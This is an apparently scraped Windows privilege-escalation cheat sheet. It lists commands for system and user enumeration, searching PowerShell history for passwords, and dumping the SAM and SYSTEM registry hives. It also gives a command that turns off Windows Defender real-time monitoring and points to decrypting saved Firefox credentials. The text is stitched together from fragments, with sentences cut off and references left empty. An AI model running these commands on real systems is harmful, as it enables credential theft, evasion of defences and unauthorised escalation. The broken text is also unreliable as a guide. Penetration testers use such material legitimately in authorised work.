Each user logged onto the system holds an access token with security information for that logon session. The system creates an access token when the user logs on. Every process executed on behalf of the user has a copy of the access token. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current
📢 Found interesting token? →
Systeminfo
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
Finding exploits
Find Exploits for version:
PowerShell history
PowerShell saves a history of specified commands in AppData which may lead to interesting data or information.
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Find groups and users
You should check if any of the groups where you belong have interesting permissions
Commands to do so
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged group?
📢 If you **belongs to some privileged group you may be able to escalate privileges**. Learn about privileged groups and how to abuse them to escalate privileges here: [Privileged Groups](https://www.notion.so/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges)
Backup Operators group?
Using BackupOperatorToDA, we can exploit the group remotely.
Unquoted service path
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space. For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
From the programfiles on the target, can be detriment that FireFox is installed. It is possible that the user nikk37 has a firefox profile with a db key. With this key we can decrypt any saved credentials. The path for the profile is default in “%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\” for Windows.
reg save HKLM\sam sam.bak
reg save HKLM\system system.bak
Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Check if the Windows version has any known vulnerability (check also the patches applied). From:
Check permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders ().
It is recommended to use first before running a script or executable (SharpHound) on the system. https://github.com/fox-it/BloodHound.py. We can use this script remotely.
